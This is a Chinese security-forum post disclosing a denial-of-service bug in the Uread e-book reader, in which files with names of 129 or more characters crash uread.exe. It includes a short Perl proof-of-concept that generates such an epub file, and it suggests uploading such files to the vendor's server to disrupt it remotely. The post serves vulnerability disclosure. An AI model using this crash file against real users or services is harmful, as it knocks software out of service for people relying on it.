[漏洞分析] Uread阅读器拒绝服务漏洞的分析与解决

1 主題	0 回帖	0 積分

热心网友

金币: 0
閲讀權限: 220
精華: 0
威望: 0
贡献: 0
在線時間: 0 小時
註冊時間: 2012-3-19

發消息

發表於 2012-7-4 14:35:54 | 顯示全部樓層 |閲讀模式

Uread阅读器在远程或本地打开文件名过长（大于或等于129个字符）的upub等文件时将引起uread.exe程序无法正常工作，必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端，实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案：
目前厂商还没有提供补丁或者升级程序。
作者 demonalex

回覆

使用道具舉報

返回列表發新帖

[漏洞分析] Uread阅读器拒绝服务漏洞的分析与解决

瀏覽過的版塊